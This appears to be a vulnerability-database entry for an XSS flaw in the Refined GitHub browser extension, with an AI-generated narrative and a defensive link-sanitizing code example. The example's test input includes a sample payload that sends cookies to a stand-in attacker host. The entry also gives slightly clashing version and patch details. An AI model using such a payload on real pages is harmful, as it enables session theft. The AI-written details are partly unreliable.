CVE-2021-34364
Description
Refined GitHub extension before 21.6.8 allowed XSS via crafted links in documents, mitigated by GitHub's CSP.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Refined GitHub browser extension, prior to version 21.6.8, contains a stored cross-site scripting (XSS) vulnerability (CWE-79). An attacker can inject arbitrary HTML or JavaScript by crafting a malicious link within a document (e.g., an issue, pull request, or comment) on GitHub. The vulnerability resides in the extension's handling of link elements in page content. Affected versions: all versions up to and including 21.6.1; fixed in 21.6.8 [1][2].
Exploitation
An attacker needs only the ability to post a crafted link on a GitHub page that is viewed by a victim running the vulnerable extension. No authentication or special network position is required beyond standard GitHub access. The attacker creates a link with specially crafted attributes (e.g., an href containing JavaScript or event handlers) that bypasses the extension's filtering. When the victim's browser renders the page with Refined GitHub active, the extension processes the link and executes the injected script within the context of the github.com origin [2].
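The link handling described above, as an added defensive example (hypothetical code written for this page, not Refined GitHub's own): an attribute allowlist that an extension could apply before re-inserting a link it found in page content, rejecting script-bearing hrefs and event-handler attributes. It assumes the extension has the link's attributes as a plain name/value map; `SAFE_SCHEMES`, `ALLOWED_ATTRS`, `hrefIsSafe` and `sanitizeLinkAttributes` are names chosen here.

```javascript
// Hypothetical hardening for an extension that re-emits links from page content.
// Works on a plain attribute map so it runs outside a browser.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
const ALLOWED_ATTRS = new Set(['href', 'title', 'class', 'rel', 'target']);

// Accept relative/fragment links and absolute links with an allowlisted scheme.
function hrefIsSafe(href) {
  // Strip control characters (tab, newline, NUL) that are used to disguise "javascript:".
  const value = String(href).trim().replace(/[\u0000-\u001f]/g, '');
  const hasScheme = /^[a-z][a-z0-9+.-]*:/i.test(value);
  if (!hasScheme) return true; // "/path", "#anchor", "docs/readme.md"
  try {
    return SAFE_SCHEMES.has(new URL(value).protocol); // URL lowercases the scheme
  } catch {
    return false; // unparsable absolute URL: reject
  }
}

// Copy only allowlisted attributes; drop on* handlers, style, srcdoc, unsafe hrefs.
function sanitizeLinkAttributes(attrs) {
  const out = {};
  for (const [name, value] of Object.entries(attrs)) {
    const key = name.toLowerCase();
    if (!ALLOWED_ATTRS.has(key)) continue;              // onclick, onmouseover, style, ...
    if (key === 'href' && !hrefIsSafe(value)) continue; // javascript:, data:, vbscript:
    out[key] = String(value);
  }
  if (out.target === '_blank') out.rel = 'noopener noreferrer';
  return out;
}

// Constructed sample: a link as an attacker might post it in a comment.
const crafted = {
  href: ' JAVA\tscript:alert(document.cookie)',
  onmouseover: 'fetch("https://attacker.invalid/?c=" + document.cookie)',
  title: 'click me',
  target: '_blank',
};
console.log(sanitizeLinkAttributes(crafted)); // href and onmouseover are dropped
```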
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser within the GitHub session. This could lead to session hijacking, data theft (e.g., repository content, access tokens), and unauthorized actions on behalf of the victim. GitHub's strict Content-Security-Policy (CSP) partially mitigates the risk, but the XSS could still bypass certain CSP restrictions depending on the injection point [1][2].
Mitigation
The vulnerability is fixed in Refined GitHub version 21.6.8, released on 2021-06-09 [1]. Users should update the browser extension to 21.6.8 or later. No workaround other than disabling the extension is available for earlier versions. GitHub's CSP provides an additional layer of defense but is not a complete fix [2].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- GitHub/Refined GitHub browser extension
- Range: <21.6.8
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- github.com/sindresorhus/refined-github/releases/tag/21.6.8
- vuln.ryotak.me/advisories/47
News mentions
No linked articles in our index yet.